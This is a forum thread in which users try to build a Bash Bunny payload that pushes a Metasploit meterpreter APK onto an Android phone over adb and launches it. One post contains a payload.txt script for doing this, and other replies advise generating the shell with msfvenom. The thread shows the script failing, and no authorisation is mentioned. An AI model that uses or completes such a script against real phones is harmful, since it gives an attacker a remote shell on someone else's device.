Payload for android

Harold Finch · February 6, 2018

Hi dear friends. I watched to this video. But I dont know, which payload he was use in this video. So, what do you think about it? Which payload must be it?

Dave-ee Jones · February 7, 2018

I've seen a variation of this one before but I can't remember what it was called - though it was mainly used for Android TVs that had cameras and things in-built.

GermanNoob · February 8, 2018

just looked until minute 2... Seems like there is only a meterpreter shell started on the device.... So just create a meterpreter shell with msfvenom, execute it on the phone and receive the connection on your metasploit computer.

Edited February 8, 2018 by GermanNoob
Detailed what to do...

Harold Finch · February 9, 2018

12 hours ago, GermanNoob said:

just looked until minute 2... Seems like there is only a meterpreter shell started on the device.... So just create a meterpreter shell with msfvenom, execute it on the phone and receive the connection on your metasploit computer.

I did it. I created payload.apk but I cant install it to my android phone with bash bunny.... Where I'm wrong, I dont know.

This is attackmode commands in payload.txt :

ATTACKMODE HID
source /bin/bunny_helpers.sh
if [ -z "{$TARGET_IP}" ]; then
LED R 2000
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED G

GermanNoob · February 9, 2018

Sorry, I never worked really with android, so I don't know adb at all. Have you checked within the logs of adb which commands work or don't work? I'm also not sure if you need to install the msf payload. Is a elf file not allowed to run on android?

Edit:

Uh, that hurts... I oversaw the obvious problem: You are using the wrong ATTACKMODE. The target will not get any IP as the you aren't using an ethernet attack... And obviously you aren't using QUACK commands, so ATTACKMODE HID seems not to be needed...

Edited February 9, 2018 by GermanNoob
Oversaw the real problem

DanMon · March 29, 2018

what IP adress i should write on $(TARJET_IP) or it doesn't change?? forgive my english, i speak spanish

InfoSecREDD · April 1, 2018

I'm personally rewriting this script, going to try and make it accessible for Android 6+ (Marshmallow). So far I have the script rewrote, just having issues with IP's..

I'll keep everyone posted within the week on whats going on.

(Side Note - I just got Zelda: Breath of the Wild, so forgive the absence.. Everyone needs a break from every now and then.)

-Ar1k88

JediMasterX · April 21, 2018

On 4/2/2018 at 1:16 AM, Ar1k88 said:

I'm personally rewriting this script, going to try and make it accessible for Android 6+ (Marshmallow). So far I have the script rewrote, just having issues with IP's..

I'll keep everyone posted within the week on whats going on.

(Side Note - I just got Zelda: Breath of the Wild, so forgive the absence.. Everyone needs a break from every now and then.)

-Ar1k88

well... ? still waiting

JMX

InfoSecREDD · April 21, 2018

Haha, I stopped at trying to get adb access to allow the BashBunny to push files.. I can get it to install, but not run.. something with how the BashBunny sends the adb command to the ADB protocol..

But I got sidetracked, been developing a website to allow Cryptocurrency to be held for super cheap.. Ugh I got so many things going on..

?

LowValueTarget · April 23, 2018

In order to work with ADB, the BashBunny needs to be a Host -- currently , there is no way to make the BB run as a host afaik.

InfoSecREDD · April 23, 2018

13 minutes ago, LowValueTarget said:

In order to work with ADB, the BashBunny needs to be a Host -- currently , there is no way to make the BB run as a host afaik.

Idk what you're talking about BashBunny is running ADB perfectly fine..

LowValueTarget · April 23, 2018

11 minutes ago, Ar1k88 said:

Idk what you're talking about BashBunny is running ADB perfectly fine..

It's connecting to the phone?

Of course ADB will run -- but will it connect?

InfoSecREDD · April 23, 2018

It runs no problem.. can push a apk, and install it.. BUT the syntax for running the apk after install is giving issues..

LowValueTarget · April 23, 2018

Interesting -- good to know.

InfoSecREDD · April 23, 2018

3 minutes ago, LowValueTarget said:

Interesting -- good to know.

Of course! I've just been super busy with other projects.. But if anyone needs any help or anything, just message me.. I've been doing crazy 15hour coding stretches so I'm just too exhausted for multiple projects at the moment..

ramirovargas007 · August 4, 2018

ES FACIL

HackFUN · October 29, 2019

Dears,

What is the exact payload to run for this attack?

Please help

Sign In

Payload for android

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation

Recently Browsing 0 members